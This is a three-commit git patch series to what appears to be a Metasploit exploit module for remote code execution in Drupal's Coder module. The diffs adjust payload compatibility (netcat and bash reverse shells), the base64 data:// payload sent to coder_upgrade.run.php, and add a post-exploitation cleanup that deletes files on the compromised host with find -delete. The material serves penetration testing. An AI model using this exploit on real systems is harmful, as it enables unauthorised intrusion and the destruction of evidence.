From b3402a45f7a8bc53b28bcbf9b30b044a1357941d Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 16 Aug 2016 23:08:09 -0500
Subject: [PATCH 1/3] Add generic payloads

Useful for testing and custom stuff.
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index 09acc05fcc..ede6cf23e5 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Compat'      =>
             {
               'PayloadType' => 'cmd cmd_bash',
-              'RequiredCmd' => 'netcat netcat-e bash-tcp'
+              'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
             },
         },
       'Platform'       => ['unix'],

From 1f63f8f45bf84f7b55a856dd411d91e14b018b60 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 16 Aug 2016 23:08:53 -0500
Subject: [PATCH 2/3] Don't override payload

pl is a cheap replacement.
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index ede6cf23e5..d792c03680 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -87,14 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
     p << payload.encoded
     p << ' #";s:4:"name";s:4:"test";}}}'
 
-    payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
+    pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
 
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
       'encode_params' => false,
       'vars_get' => {
-        'file' => payload
+        'file' => pl
       }
     )
   end

From 4228868c2955e2935884592a3b42df6400d07e0d Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 16 Aug 2016 23:09:14 -0500
Subject: [PATCH 3/3] Clean up after yourself

Can't use FileDropper. :(
---
 modules/exploits/unix/webapp/drupal_coder_exec.rb | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
index d792c03680..8542736d30 100644
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -98,4 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
   end
+
+  # XXX: FileDropper can't handle weird filenames
+  def on_new_session(session)
+    # This find command should be decently portable...
+    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
+    print_status("Cleaning up: #{command}")
+    session.shell_command_token(command)
+  end
 end